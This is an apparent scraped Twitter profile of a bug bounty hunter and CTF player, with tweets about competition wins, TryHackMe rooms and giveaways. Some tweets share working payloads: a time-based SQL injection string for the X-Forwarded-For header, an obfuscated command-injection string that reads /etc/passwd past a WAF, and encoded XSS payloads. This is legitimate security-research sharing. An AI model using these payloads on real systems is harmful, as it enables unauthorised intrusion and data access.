I found 2 Blind time-based SQL Injections in X-Forwarded-For: header just using Burp Intruder. Made a list of 500+ HTTP request and tested one by one for 3+ hours, here is the result..
X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
#BugBounty
MD. GOLLAM RABBI
@n1ghtmar3_2421
Hey. It's me. Orin. I am a medical student, a Bug Bounty Hunter and a CTF Player
Science & TechnologyJoined December 2020
MD. GOLLAM RABBI’s Tweets
Another 3 got triaged in a night . Keep digging deep boys. And your methodology rocks 🔥
2
1
48
Hey guys. I just became champion of HackerOne Bug Hunt 2023
Quote Tweet
We want to congratulate @n1ghtmar3_2421 for standing on the Champion position of HackerOne Bug Hunt 2023 competition, also Congratulations to @Osrafi2 & @0x_saikat for securing the First Runner up & Second Runner up position Respectively!
Show this thread
4
1
56
Me and the Boys 🔥
Quote Tweet
7
Quote Tweet
Seized prizes of Cyberdrill 2021 by Our Federal_Bonk_Investigations ( @fbictf ) Members.
1
Thank you, , for choosing to support #BugHunt2023 as our "Powered by" sponsor! We are thrilled to have your company on board and look forward to working together to make this event a success.
11
53
Quote Tweet
Congratulations to IUT Genesis, Bonk_Police & Cyber Security Enthusiasts, for taking over the first, second & third place respectively in RIoT Center Flag Hunt 2022.
3
1
42
It was really nice playing #NahamCon2022 CTF w/ The Team
The improvement was great from the last year.
Kudos to all other players 🥳.
3
3
12
Alhamdulillah🥰
We captured the 3rd position in CTF.
Great experience w/ The Team
The progress is getting better day by day🥳
4
17
4
I conquered 2021 with [Federal_Bonk_Investigations]( ). We solved 12 challenges! duc.tf/c/jRbp #ductf2021
1
2
11
Regular expressions - I have just completed this room! Check it out: tryhackme.com/room/catregex #tryhackme #regular expressions #regex #bash #terminal #grep #catregex via
1
10
Our Team, #Federal_Bonk_Investigations(also known as #Bonk_Police) got 64th ranked in CTF.
#defcon29 #no_horny
1
5
Show this thread
relatable enough?
Quote Tweet
1
3
Hello,
If you are just getting started into bug bounties and can't find enough resources, this thread might help you to find a way 👇
43
705
1,624
Show this thread
I just pwned USB Ripper in Hack The Box! hackthebox.eu/achievement/ch #hackthebox #htb #cybersecurity
Saw and fight on KOTH and spam each other with /dev/urandom and BoOm! Got hooked. Started practicing as much as I could. It is really fun and helped me practice for CTF challenges.
Quote Tweet
Half a million people are learning cyber security on TryHackMe!
Retweet this & let us know why you signed up to TryHackMe? 5 random answers get $100 worth of Swag/Vouchers/Prizes
Thank YOU for supporting us!
250k of you signed up in the last 6 months: blog.tryhackme.com/there-are-half
2
For Business Reasons - I have just completed this room!
Check it out: tryhackme.com/room/forbusine #tryhackme #pivot #docker #ctf #realistic #web #network #privesc #linux #challenge #wordpress #forbusinessreasons via
4
If you've found an OS command Injection with WAF enabled, special characters like (/"'&|()-;:.,`) and whitespaces blocked. Try this method to bypass.
-
E.g.: reading /etc/passwd file:
cat$IFS$9${PWD%%[a-z]*}e*c${PWD%%[a-z]*}p?ss??
-
Credit: Aysar Harb
-
#cybersecurity #pentesting
read image description
ALT
13
545
1,330
Show this thread
Xss in asp pages reflected inside span and < blocked.
Payloads:
%u003Csvg onload=alert(1)>
%u3008svg onload=alert(2)>
%uFF1Csvg onload=alert(3)>
#bugbounty #bugbountytips
7
126
318
🎉Giving away one subscription for
♥️♥️ ♥️♥️
Will select a random person from the retweets .
P.S. You dont have to follow me for participating in the give away .Winner will be selected randomly .
65
307
239
🎉🎉🎉Giving away one
subscription valid for
🔥🔥 3 months 🔥🔥
Will select a random person from the retweets .
Thanks to the person who gave it to me to share with the community 🙏
82
404
281
1/ WIN A SUBSCRIPTION TO YOUR FAVOURITE HACKING LEARNING PLATFORM
tinyurl.com/4wey55cm
14
174
319
Show this thread
Alhamdulillah,got my first account takeover vulnerability triaged on bugcrowd. Thanks for this amazing talk on youtube.com/watch?v=0QFByA . Took notes of one p4 and p5 as suggested on the video and chained them with XSS and got one click to full account takeover.
3
2
44
Show this thread
My API Security Checklist, still researching, will update over time.
#BugBounty #BugBountyTip #BugBountyTips #InfoSec
17
502
1,261
EnterPrize - I have just completed this room! Check it out: tryhackme.com/room/enterprize #tryhackme #enumeration #web #real #enterprize via
1
3














